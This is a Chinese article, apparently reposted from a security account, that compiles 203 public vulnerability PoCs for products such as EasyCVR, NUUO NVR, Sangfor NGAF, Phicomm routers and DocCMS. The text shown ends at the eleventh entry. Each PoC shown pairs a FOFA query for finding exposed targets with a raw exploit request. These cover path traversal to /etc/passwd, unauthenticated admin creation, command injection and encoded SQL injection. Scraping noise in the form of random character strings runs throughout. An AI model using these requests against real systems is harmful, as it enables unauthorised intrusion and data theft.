互联网公开漏洞整理202309-202406
+ J1 T7 ~/ c- z$ e( f7 V道一安全 2024-06-05 07:41 北京! y5 K9 n/ { z5 R& M+ n
以下文章来源于网络安全新视界 ,作者网络安全新视界
$ R2 N" s( v. Y5 A, j" N% ]! R- A6 m+ j9 l8 r
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。5 i6 ?: R) c" B+ X$ w/ q) V
1 R5 [. q& n* U2 a9 ]- N
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。" P) ?* g* j% m) C* A6 S
% u3 v4 f8 F( { I安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。6 t( T1 O% g* P8 N3 E0 J; l9 z
$ q" J( z( s) P& l- n
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。0 j$ |) P$ Y( [0 }8 e1 {
/ z) D1 c5 e- g2 v
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。" @" P9 ^, w7 p& W
" A3 K$ L! G5 M7 z
) j' w, C* {4 _8 [声明% y+ \- Q8 P7 i5 ~0 B
( b+ }& G1 ?" I
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。; f( _" F6 l6 ~8 _) q( r7 J2 s
+ H5 ?+ C( v/ Y' n" k6 d# X: e
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。1 ^: G0 l/ B5 s0 u0 ^; J# v$ \) }
6 ~- d; R Y6 |; l3 f: A
4 y7 y- Q D. [8 Z" j1 b: G0 l
- T$ ^4 E$ q& u5 z2 U8 q0 S" h" X" B目录* v$ a2 d5 P; L
0 p5 \1 X- t, l9 k' |01+ R3 k i5 R" A- T w
8 h. q- O6 n+ l7 m& b
1. StarRocks MPP数据库未授权访问0 c* a9 h M+ M5 ?3 y* W" A. E
2. Casdoor系统static任意文件读取
N6 H- E' O. h1 @6 d3. EasyCVR智能边缘网关 userlist 信息泄漏2 V5 }1 P" c+ N
4. EasyCVR视频管理平台存在任意用户添加% Y3 I# Z: A* J3 W
5. NUUO NVR 视频存储管理设备远程命令执行3 ]. L6 K) {" K6 e6 G0 C' I2 b
6. 深信服 NGAF 任意文件读取
: ?; R" f" Q" Z% a* p* Y7. 鸿运主动安全监控云平台任意文件下载' L# Q( g: ?- r8 @4 Y5 N- |7 U
8. 斐讯 Phicomm 路由器RCE
& Q2 L9 X5 f9 X6 a( {! L7 ]9. 稻壳CMS keyword 未授权SQL注入
% T- E6 H9 I& f) E% i6 w+ F" N10. 蓝凌EIS智慧协同平台api.aspx任意文件上传. U- G/ z# u4 ~
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
2 y4 k0 ]# M. f! L0 P12. Jorani < 1.0.2 远程命令执行
) z# T w8 N( b* |- o2 g2 n+ P/ B13. 红帆iOffice ioFileDown任意文件读取7 |3 u- m" V3 t0 {
14. 华夏ERP(jshERP)敏感信息泄露* V* Y- {1 e9 s5 E, M9 }
15. 华夏ERP getAllList信息泄露9 ], O- K- E2 ^* z. R# I3 D
16. 红帆HFOffice医微云SQL注入
4 t/ _$ O8 E; v17. 大华 DSS itcBulletin SQL 注入
1 o1 r: o, A( N18. 大华 DSS 数字监控系统 user_edit.action 信息泄露7 E; E- ~( i6 a/ f: H- K
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入' j4 ]; Z0 j3 z5 }
20. 大华ICC智能物联综合管理平台任意文件读取: E f+ ~1 w' I/ B% g8 F/ @
21. 大华ICC智能物联综合管理平台random远程代码执行/ V ^! f/ b' t
22. 大华ICC智能物联综合管理平台 log4j远程代码执行" D5 k3 U T* z5 Y
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
4 X$ K8 T1 Q# Q* v9 ~4 R24. 用友NC 6.5 accept.jsp任意文件上传" F6 f) E! Y; Z j2 Y0 W# M% r4 ]
25. 用友NC registerServlet JNDI 远程代码执行
4 d6 f+ d% c8 W6 w Z4 g0 d* n6 y26. 用友NC linkVoucher SQL注入6 K0 M2 b8 E' q+ Y
27. 用友 NC showcontent SQL注入4 N" X3 e. c" h# I
28. 用友NC grouptemplet 任意文件上传8 t8 ]0 ?$ ]% g* h8 r, K6 W# |
29. 用友NC down/bill SQL注入
! m; r- C: A! C R30. 用友NC importPml SQL注入8 G p$ i. h B: i+ L5 I" M
31. 用友NC runStateServlet SQL注入5 C3 P0 C: c$ z1 t
32. 用友NC complainbilldetail SQL注入
" H0 ^* _4 _/ }3 f' q7 H5 _& N33. 用友NC downTax/download SQL注入
& Z+ ?. k0 U& q* f34. 用友NC warningDetailInfo接口SQL注入- {& Q; @' x% C: i. g
35. 用友NC-Cloud importhttpscer任意文件上传6 N+ ~% E7 {& T0 s2 @0 x9 H, T) _
36. 用友NC-Cloud soapFormat XXE
! ~1 V2 Q. O- t8 D1 }37. 用友NC-Cloud IUpdateService XXE3 H3 Q. R- ?. j1 p+ Y; e6 H
38. 用友U8 Cloud smartweb2.RPC.d XXE
. b" }1 }- \2 I5 f. P7 g39. 用友U8 Cloud RegisterServlet SQL注入& m$ g* J- {, O( }1 q0 s2 j$ E2 H
40. 用友U8-Cloud XChangeServlet XXE* b `3 h Q1 I
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入2 G5 f t$ x% D8 o E$ z% h) B6 r
42. 用友GRP-U8 SmartUpload01 文件上传* z9 C& I8 b! R, e: v |
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
$ ]% ^0 [, C2 r* d1 m; E7 V44. 用友GRP-U8 bx_dj_check.jsp SQL注入
9 u8 d3 o% x" Q K+ @- o45. 用友GRP-U8 ufgovbank XXE$ ?, Z/ A% ]( [' R" q2 M
46. 用友GRP-U8 sqcxIndex.jsp SQL注入; t Z" _0 y( j' p: ~+ k- X& }
47. 用友GRP A++Cloud 政府财务云 任意文件读取
- {% y l/ |. X( g/ |48. 用友U8 CRM swfupload 任意文件上传
?& m' ^/ W: V- Z0 y' F' E% ?( J5 V/ \49. 用友U8 CRM系统uploadfile.php接口任意文件上传
# F* f3 c& d9 G q" t, \50. QDocs Smart School 6.4.1 filterRecords SQL注入9 g: _: R6 o( K. u2 T ]6 d
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入9 u. h* k, u& }; Z
52. 泛微E-Office json_common.php sql注入
4 Z1 o: ?+ {" `; \; `53. 迪普 DPTech VPN Service 任意文件上传6 H, T u9 n. z2 B; c( r8 \+ u3 h
54. 畅捷通T+ getstorewarehousebystore 远程代码执行* u4 v2 Z7 |9 _2 N, t1 h! W
55. 畅捷通T+ getdecallusers信息泄露
$ p6 _+ o7 F& {+ A56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
( w+ t; o4 D6 z2 ^! @57. 畅捷通T+ keyEdit.aspx SQL注入
9 r+ n8 X6 Q: k58. 畅捷通T+ KeyInfoList.aspx sql注入
0 x% G( p3 t: m$ v+ q- e) ]59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
+ D/ t' y' B$ y: V$ k60. 百卓Smart管理平台 importexport.php SQL注入+ h8 o% n! D4 @% e. x3 R8 d, V
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
- O4 V6 F; k5 ~7 u& b2 g62. IP-guard WebServer 远程命令执行
9 x& ?) H1 m5 A8 r( S63. IP-guard WebServer任意文件读取2 F9 i' ~- v( C+ P+ [- u2 L
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
9 d4 F# }& ~- O( k65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过8 J+ i+ x5 H0 k, P& I+ A8 `- s, s
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
1 U& B" j. }, i4 g67. 万户ezOFFICE wpsservlet任意文件上传1 _' [! y; r* C) q" S8 k
68. 万户ezOFFICE wf_printnum.jsp SQL注入5 ?" w' \' }' M/ S) ~
69. 万户 ezOFFICE contract_gd.jsp SQL注入
2 T! @( y( i: j6 U7 D70. 万户ezEIP success 命令执行! H* t$ p% ]$ [0 V0 h5 c( d
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入0 f! @! a. X2 I% w
72. 致远OA getAjaxDataServlet XXE
4 Z% }7 n& c& G73. GeoServer wms远程代码执行
+ O* p: ]% J2 W u" Z4 g74. 致远M3-server 6_1sp1 反序列化RCE
/ P6 f/ o" v) L, F% [75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE+ |+ n, L; t. C' m5 R' h0 N7 F# D
76. 新开普掌上校园服务管理平台service.action远程命令执行3 |' u1 z# H2 y" \6 G
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
: n2 [/ l# p( V, C3 {9 T78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传0 w4 A' E+ z( w9 w" J
79. BYTEVALUE 百为流控路由器远程命令执行
- `, h4 b' [8 w80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传6 Q- k4 h# f$ B. J2 Y
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
3 Y% p$ |1 V0 s0 B8 x82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
7 [8 k5 }/ K* b: h" X7 J83. JeecgBoot testConnection 远程命令执行
+ h" L5 m; S; ~% V( }- Y84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
2 f2 V( ?3 `3 ~7 e85. SysAid On-premise< 23.3.36远程代码执行
7 d5 ?, f1 Q0 u, H% \8 {% W86. 日本tosei自助洗衣机RCE
$ T% g5 _. y2 N& v* p- R0 s7 Q87. 安恒明御安全网关aaa_local_web_preview文件上传- m! d3 w( e' }) s4 c, ]2 `
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
9 r9 V- v7 P- W6 F89. 致远互联FE协作办公平台editflow_manager存在sql注入$ G5 R! R: {6 r6 U6 c3 |9 P
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
& m; I# U S7 p91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
3 D1 D+ K$ C6 M0 G: d92. 海康威视运行管理中心session命令执行
: G# l7 A0 ]2 o" @/ V" q; f93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传! \& s6 E- J' o, g5 ]2 q% K9 p; \
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
: _* M3 n; m6 l3 w, b! B95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行8 D, a" H4 T8 I- @2 Q- q5 F* q
96. Apache OFBiz 18.12.11 groovy 远程代码执行
$ `0 B; C2 ~# X4 W7 ?97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行% J/ q" x; \1 N( G# k5 ^) x1 T
98. SpiderFlow爬虫平台远程命令执行
; K d. V* f, t0 Q7 ]) g$ d# a% g8 Z99. Ncast盈可视高清智能录播系统busiFacade RCE
3 s+ T" h, y% K; B f* w1 w4 [: O100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
6 S. Y: C: N* c0 R% L/ O- c101. ivanti policy secure-22.6命令注入
3 d7 V, ^, z0 i0 L102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
4 w$ x2 |. w; m$ |% T& g( f6 I2 X103. Ivanti Pulse Connect Secure VPN XXE
; W) N, A# z* m1 \0 g104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露) f) \2 H$ k2 E$ V; G
105. SpringBlade v3.2.0 export-user SQL 注入
, W- P6 @1 p& b- W* ~106. SpringBlade dict-biz/list SQL 注入
5 I) F; L ]- K, L$ H107. SpringBlade tenant/list SQL 注入9 |9 l% P8 u3 G" v5 G2 M% G7 s
108. D-Tale 3.9.0 SSRF
- y8 D1 ]( l+ O% y109. Jenkins CLI 任意文件读取
( p: n4 Y R# ?' ]6 U- ^- @$ A' b7 H110. Goanywhere MFT 未授权创建管理员
?) u) @7 ^. t8 a% ~8 ]- z! r- ^111. WordPress Plugin HTML5 Video Player SQL注入1 N# O$ T* H' P. }5 g: L8 v+ _% Q
112. WordPress Plugin NotificationX SQL 注入
: \$ v' D2 S, r, M- A+ m) Z' p113. WordPress Automatic 插件任意文件下载和SSRF9 _. S: d/ Z4 k) a
114. WordPress MasterStudy LMS插件 SQL注入
. i, V$ G, {0 ~- i0 x* p5 _115. WordPress Bricks Builder <= 1.9.6 RCE: f& e5 y4 z* \' f6 U5 } }
116. wordpress js-support-ticket文件上传
1 ?5 m5 Q/ {( E, \7 d' l117. WordPress LayerSlider插件SQL注入8 `# u/ a' k! @+ P6 b8 U+ L
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
, k( [* v; |" e119. 北京百绰智能S20后台sysmanageajax.php sql注入$ m5 N* G% U, ?1 c1 |1 D
120. 北京百绰智能S40管理平台导入web.php任意文件上传: W! g; v& T4 i# h
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
3 D P& j' P% w% o1 R0 f122. 北京百绰智能s200管理平台/importexport.php sql注入5 Z2 h9 d! }1 [
123. Atlassian Confluence 模板注入代码执行
3 z8 l8 R( B$ { j' a, b' i124. 湖南建研工程质量检测系统任意文件上传1 e. F/ L! v, `, ~
125. ConnectWise ScreenConnect身份验证绕过% ^# x E& t0 E. E) A+ y
126. Aiohttp 路径遍历
7 g8 w9 r# E3 i2 k L127. 广联达Linkworks DataExchange.ashx XXE
# w( [+ P! q+ r* x128. Adobe ColdFusion 反序列化4 A- N# O" C$ Y: }% I" r1 l) B
129. Adobe ColdFusion 任意文件读取
1 M* `! Y' J* Q& K( \130. Laykefu客服系统任意文件上传' q' ^$ E' |: z) Z
131. Mini-Tmall <=20231017 SQL注入1 Q8 X; T( L# B" o8 L
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
5 u2 H; q, h# x: _133. H5 云商城 file.php 文件上传
" z4 w3 p$ @0 c134. 网康NS-ASG应用安全网关index.php sql注入8 L6 _* i4 Y& U* p; U
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
, e' l, x. b4 D( T2 a: k0 ]136. NextChat cors SSRF" X) C( T" _, g( e5 S+ f. U3 j
137. 福建科立迅通信指挥调度平台down_file.php sql注入
2 C, z/ x& N2 i* ^; [138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
8 f/ ?+ M0 A: ~7 a% r139. 福建科立讯通信指挥调度平台editemedia.php sql注入# H0 i5 ^" O8 y
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
?& {1 }7 z; {. q3 H141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入1 Y. B* z1 z4 w
142. CMSV6车辆监控平台系统中存在弱密码
' ^, h$ _) S6 S$ |8 z) H143. Netis WF2780 v2.1.40144 远程命令执行5 K& V8 R+ [9 j7 R2 U
144. D-Link nas_sharing.cgi 命令注入
# w+ Q* {- O0 w5 ^# @* c145. Palo Alto Networks PAN-OS GlobalProtect 命令注入3 e1 a5 w' g) Z
146. MajorDoMo thumb.php 未授权远程代码执行
" w L$ m6 U) ~- I147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
% [- R9 |+ N, s1 f- \; d1 Z148. CrushFTP 认证绕过模板注入) O9 ^0 d( T2 _9 ]7 R$ M
149. AJ-Report开源数据大屏存在远程命令执行
- a; C; T2 `$ B150. AJ-Report 1.4.0 认证绕过与远程代码执行
( Q9 O. L7 B" t: C6 U151. AJ-Report 1.4.1 pageList sql注入
X( ~6 s, \: ~* H152. Progress Kemp LoadMaster 远程命令执行# B6 k7 S: u+ G: f! ^- d
153. gradio任意文件读取& m; k7 M1 m' C8 I
154. 天维尔消防救援作战调度平台 SQL注入
7 Y; v* h4 J$ Z G! ^; F0 E* I155. 六零导航页 file.php 任意文件上传" p/ C4 j! ^+ e/ v4 S8 B
156. TBK DVR-4104/DVR-4216 操作系统命令注入' E5 Z& J3 I1 E* Y: F7 a& N
157. 美特CRM upload.jsp 任意文件上传# ~) w* q' I* F& S" ^8 o! o/ u6 t6 ^
158. Mura-CMS-processAsyncObject存在SQL注入
# g4 b: X: k( H' {3 p. C" x159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
3 Y: d( ?# L' R: R5 k160. Sonatype Nexus Repository 3目录遍历与文件读取
+ X' r1 n8 E& O& |% c161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
0 R( G" C5 V2 z( n162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
! m8 W# w; `: R! a163. 号卡极团分销管理系统 ue_serve.php 任意文件上传' p: K0 O" b' @* ]- x3 X
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
7 v) A3 e6 R% ^/ q1 o( T165. OrangeHRM 3.3.3 SQL 注入, `* f- r+ T3 N: K$ R4 H* E; m1 g9 N
166. 中成科信票务管理平台SeatMapHandler SQL注入" X* C/ [3 d' {" J) `: D- L
167. 精益价值管理系统 DownLoad.aspx任意文件读取
& j1 t% ~+ O3 O. q; W& ]1 u" _168. 宏景EHR OutputCode 任意文件读取9 I- e! q# E- T) Z4 ?9 ]+ t
169. 宏景EHR downlawbase SQL注入# b, D+ q6 M& Z+ A% @" K1 j
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
5 }# a7 v# _; t3 E- p& E- k171. 通天星CMSV6车载定位监控平台 SQL注入
$ _) P2 T( Z1 N, h' f3 g$ E1 r172. DT-高清车牌识别摄像机任意文件读取
& B7 s4 `+ A! ~- `: D" i( p9 X173. Check Point 安全网关任意文件读取4 q, _" n' C( H+ ~) A
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
6 d" W7 x3 _' v1 W175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入" ?( H$ `! X. e1 s
176. 电信网关配置管理系统 rewrite.php 文件上传4 l# _! W0 q' ~3 [" `. ?3 D. G
177. H3C路由器敏感信息泄露( A% J$ X1 J8 w0 t1 W5 M
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
2 o: Y1 p; e4 b* M0 l' q179. 建文工程管理系统存在任意文件读取
; g5 n w; J' q: o! C! S) O180. 帮管客 CRM jiliyu SQL注入8 S6 D: P: o2 X& U
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
. K( x2 k; p) M2 V/ Z( v$ L182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
6 I' {* X, N* D" {9 D7 \: j/ |. g183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入! I- f6 s" _6 ~. ^! H- T: B
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
3 l0 ^7 v$ [# V9 y0 E9 c185. 瑞友天翼应用虚拟化系统SQL注入
/ f9 o$ O' @) U186. F-logic DataCube3 SQL注入( S) S, N' o, X2 c$ O1 J1 H
187. Mura CMS processAsyncObject SQL注入
! \* E! C4 ?: W w1 |: `4 w9 E188. 叁体-佳会视频会议 attachment 任意文件读取* d, D. B5 h0 P5 R# _8 f/ P
189. 蓝网科技临床浏览系统 deleteStudy SQL注入8 v& _; [7 ~" s
190. 短视频矩阵营销系统 poihuoqu 任意文件读取9 Q4 F$ s8 F, }: i. v5 [
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
8 J* i- V# |7 ]- |192. 富通天下外贸ERP UploadEmailAttr 任意文件上传) m$ D X& M) _( ^& v7 H: r. V" {7 ^
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行" \% [ K7 L. `
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
' @; @7 \5 ~5 `195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
4 z" I7 `" g3 }/ d' q5 |196. 河南省风速科技统一认证平台密码重置
+ W: W4 o. Z, v7 k c: F197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
7 u4 y) _& q8 ~. J6 c( X. c5 y198. 阿里云盘 WebDAV 命令注入
: h. k2 n: k8 w7 s+ R199. cockpit系统assetsmanager_upload接口 文件上传. {8 D$ \* Q/ H4 E
200. SeaCMS海洋影视管理系统dmku SQL注入
; F# Q1 H b3 z% C6 W1 C, C/ M201. 方正全媒体新闻采编系统 binary SQL注入2 f1 q9 ]9 q0 B/ ?5 p0 \
202. 微擎系统 AccountEdit任意文件上传3 C, g3 v. X& _8 y( Y
203. 红海云EHR PtFjk 文件上传/ v5 |2 ?$ L) @: M% A% A
( J5 ]5 H0 m, C
POC列表% F! l9 ^+ B) u3 h! Y' o, g- o
. T3 P$ R( j) {8 J9 p3 K
02! J m; k0 d1 T# |. X8 c& [
: ~) X. }6 X, S6 p/ d! H1. StarRocks MPP数据库未授权访问* n5 R) J) j O% Q+ L3 I
FOFA :title="StarRocks"
! p# ~- \% A0 q! s# Q% R# tGET /mem_tracker HTTP/1.1& c0 X/ e/ A$ C! q
Host: URL
; J( n" a' R! K8 }/ |+ X& e; X' c+ M4 x
. i+ j0 l- p9 i3 G* P% W2. Casdoor系统static任意文件读取
' @1 z5 @3 ^4 y# H7 e0 I9 M1 K" sFOFA :title="Casdoor"8 c5 N# l0 U/ V
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
* F& q% G+ x3 X p& S$ E9 ^Host: xx.xx.xx.xx:9999
$ B( Y; u- D0 RUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
) x/ }/ d! Y6 B$ Y1 l' SConnection: close" k4 |3 `4 n f9 e
Accept: */*
7 v( }$ V0 M% }Accept-Language: en
6 x( o% @- L! ?: V( f, cAccept-Encoding: gzip7 o! u( E/ Y5 H6 r
/ {& U( x$ I1 E% b; V, s. V, b! ~* C! i
# ]( \' O& v" y7 _0 x; x3. EasyCVR智能边缘网关 userlist 信息泄漏! E4 {) b; k; v; {6 ~
FOFA :title="EasyCVR"6 _: B! C$ e/ X
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
8 Q+ i7 M+ d1 T: ^# k/ b/ jHost: xx.xx.xx.xx
9 ]$ y" b" \# J. |! n& g8 i3 q7 f% |4 Z& H' R' B9 y* S
. n! z+ N1 y+ X8 `: W n
4. EasyCVR视频管理平台存在任意用户添加
1 j. A" D2 x% a3 y, s8 P" P; _1 AFOFA :title="EasyCVR"
/ Z: _5 y5 t5 r& A2 y9 k/ ?
0 I# Y4 a5 h: o: C- A: ?, d. O4 ^password更改为自己的密码md5
& D( b& ~' {8 z/ ^1 KPOST /api/v1/adduser HTTP/1.14 b! K6 a( P* Z* E2 B
Host: your-ip+ Y: w# h9 P/ M6 Y" @; }7 n! x7 R, t
Content-Type: application/x-www-form-urlencoded; charset=UTF-8' `+ m5 O5 u4 Y/ V
7 Y6 f0 f5 S& X. a
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
5 l6 A% s3 V8 m" j* u% h
) @5 B" }* m6 L- g3 a: {5 \& C5 X& C8 ]8 d
5. NUUO NVR 视频存储管理设备远程命令执行
/ @2 Q4 o T2 N rFOFA:title="Network Video Recorder Login"
% i/ M6 V- G! w; fGET /__debugging_center_utils___.php?log=;whoami HTTP/1.19 _9 q* o; C" o: x
Host: xx.xx.xx.xx
" ?4 V& E" |1 K& v$ [" N, D; a; \, w5 \6 E( E9 v1 `( q
4 i! x& U9 W! K, X' X% O
6. 深信服 NGAF 任意文件读取9 ?) j( Y4 W! t N2 E7 ^8 Z6 V: x
FOFA:title="SANGFOR | NGAF"; x0 a( j$ f N: x6 a
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1' o* @' n# y* K7 _
Host:
6 _$ k! a5 q2 o
" K8 @* x+ R" K: G3 V3 Z' t) X. W1 y2 D4 h
7. 鸿运主动安全监控云平台任意文件下载9 X; {/ u" V0 N% A
FOFA:body="./open/webApi.html"( n: @; T$ c( t% B+ L: w
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
4 H9 H0 M. W/ K& O A- M5 XHost:$ U: Z1 m8 w5 S Z+ D m% [; }
4 ]3 c. B' p! z: E& v6 f8 c, a: d! Y; `" X, F* d! U0 t ?6 C
8. 斐讯 Phicomm 路由器RCE$ Y; o s" M# n$ ^ @
FOFA:icon_hash="-1344736688"; H/ P0 X/ ` j
默认账号admin登录后台后,执行操作
' }& v0 g" P# x" H, a9 X4 `1 K9 r7 DPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1' |1 a. N9 F- @5 K6 a3 ?% f" k
Host: x.x.x.x
6 z7 S/ L! J( l# _1 KCookie: sysauth=第一步登录获取的cookie
+ w; K8 N3 c0 J& T+ EContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
+ ^0 X9 C5 N9 M, x3 qUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
5 A- k9 `* D4 [/ s. r
3 f/ d; l# O" U' i; T5 F$ ^: R------WebKitFormBoundaryxbgjoytz
. ]; S9 _ U H7 o& XContent-Disposition: form-data; name="wifiRebootEnablestatus"
# {1 ^2 ?. h, j9 F1 y' m" x% Q* L, `: d; [3 h9 T" p. b, o
%s
$ ~' |, N1 A. J. `. J+ S0 F4 m------WebKitFormBoundaryxbgjoytz2 }7 B4 m0 N$ c
Content-Disposition: form-data; name="wifiRebootrange"- M+ q% e( M, A9 b
! A" N5 M4 H; |6 p h7 P' e5 `! Y
12:00; id;
: K* w4 x# n2 \. S4 w$ o. W# ]1 U------WebKitFormBoundaryxbgjoytz0 x# k2 j* z( ~% V# k
Content-Disposition: form-data; name="wifiRebootendrange"8 Z1 P+ T2 q0 @4 e4 Q7 |2 q8 r/ O
$ w& [4 s7 g* j, d4 Q; ]%s:1 C) M8 X6 I2 a* S V2 T, Z( e) [
------WebKitFormBoundaryxbgjoytz
5 R* B# p$ n' s2 x2 `! S0 V8 w) SContent-Disposition: form-data; name="cururl2"0 F! `! L ^: S) c: R& v
' I( J4 m$ W. h( p7 b! m: }9 B3 b. C [. P J9 n/ w. D( }0 @
------WebKitFormBoundaryxbgjoytz--2 M, [9 t+ R1 U; I6 ]. j
2 A! V& c7 [3 Z3 ?: o! r, \3 |
2 m. N& q: P3 ?1 I! @. _9. 稻壳CMS keyword 未授权SQL注入( N& u( y# D+ ?/ W" h" P# q
FOFA:app="Doccms"
' k! \/ h4 h( LGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
8 t' W0 C( E( Y. l8 B2 \Host: x.x.x.x
. @) U. p' R m! y
' ]0 F( s* o! [* U! Q
3 Q+ K2 N, @" v: t3 y+ b5 ^payload为下列语句的二次Url编码
: v$ b, d, u; V* F# g5 |
! K9 i% q# z% V2 }+ K! F: \' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
% y |7 i6 u7 t3 ?8 |+ D* l( S3 W+ a# h6 o, n8 L3 ^
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
* W8 L9 W. q$ k) e lFOFA:icon_hash="953405444"$ P6 I& j5 m! k4 }; ^
7 D1 Z. {6 }1 h, R* t
文件上传后响应中包含上传文件的路径 [, A' P# m/ I7 X% B( k5 r) s0 N
POST /eis/service/api.aspx?action=saveImg HTTP/1.1& ?7 F, z3 x% R0 y
Host: x.x.x.x:xx
# D7 w0 V0 x& U" t# h* n7 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
. O3 b7 i9 F- W4 o3 IContent-Length: 197
& p- g" b9 v! _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.98 O: X2 D& z$ J. b) Z, ^' K
Accept-Encoding: gzip, deflate. {; j6 ?' g% e# n
Accept-Language: zh-CN,zh;q=0.9: c- z& X! m! t
Connection: close
p0 p; J) b4 k" @; O* LContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu% t9 C, g# r% u8 {+ n. p/ k
4 I% y/ `, B. g$ `------WebKitFormBoundaryxdgaqmqu
$ T5 M3 @4 ]% Y- |6 S: [. EContent-Disposition: form-data; name="file"filename="icfitnya.txt"- o- C" i6 b7 Q0 z# b4 ]( g
Content-Type: text/html
4 ~8 p: s) k' F. \6 S/ P6 \- h5 Z
" @$ l4 y1 @' E) L3 W E9 Gjmnqjfdsupxgfidopeixbgsxbf
/ P5 f6 Q6 N5 v5 u------WebKitFormBoundaryxdgaqmqu--# S5 P# X) A$ |! \1 N3 O: q g
6 g, E m8 R& N1 }% _9 Y l4 d4 }$ I- ^) E
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入7 k- ]& B! ~: n; I, R* D
